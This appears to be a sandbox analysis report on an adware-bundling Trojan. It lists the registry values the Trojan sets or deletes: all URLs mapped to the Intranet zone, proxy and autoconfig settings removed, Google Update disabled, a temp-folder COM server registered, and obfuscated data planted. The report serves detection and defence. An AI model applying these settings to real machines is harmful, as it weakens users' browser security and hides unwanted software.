[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 45 4D 19 EE 1D E8 01 14 18 04 96 41 37 81 7C"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"InstallDate" = "20140701"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"SilentUninstall" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"CategoryName" = "Apps"
"NoRepair" = "1"
"ProductName" = "CutThePrIcE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"NoModify" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"UninstallString" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe /s /n /i:ExecuteCommands;UninstallCommands"
"InstallDate" = "20140701"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"SilentUninstall" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayName" = "CutThePrIcE"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 C0 A7 2F 84 63 D6 00 93 4F 6E 60 95 C8 6E CE"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Trojan modifies IE security zone settings to map all local web nodes with no dots in their names, which are not assigned to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"CategoryName" = "Apps"
"NoRepair" = "1"
"ProductName" = "CutaThePrice"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"NoModify" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"UninstallString" = "%Program Files%\CutaThePrice\CutaThePrice.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
"UpdateDefault" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"SilentUninstall" = "%Program Files%\CutaThePrice\CutaThePrice.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayName" = "CutaThePrice"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 03 1F 34 56 16 EB 31 95 6F 64 32 0F 76 D4 A4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"InstallDate" = "20140701"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Trojan modifies IE security zone settings to map all local web nodes with no dots in their names, which are not assigned to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:440 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"SilentUninstall" = "%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"UninstallString" = "%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 B5 29 E0 BD 96 28 92 29 8E B0 C9 E8 09 C8 F5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"InstallDate" = "20140701"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"ProductName" = "Web Protector Reliable Phishing Protection"
"DisplayName" = "Web Protector Reliable Phishing Protection"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Trojan modifies IE security zone settings to map all local web nodes with no dots in their names, which are not assigned to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process NybbleCrawler.xyz.exe:356 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c5705860" = "Vx////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c99a5f5c" = "///%"
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a1dcff5b" = "V/////%%"
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"CategoryName" = "NybbleCrawler"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"3c09c42b" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0c230bcb" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0c230bcb" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Mode" = "4026531840"
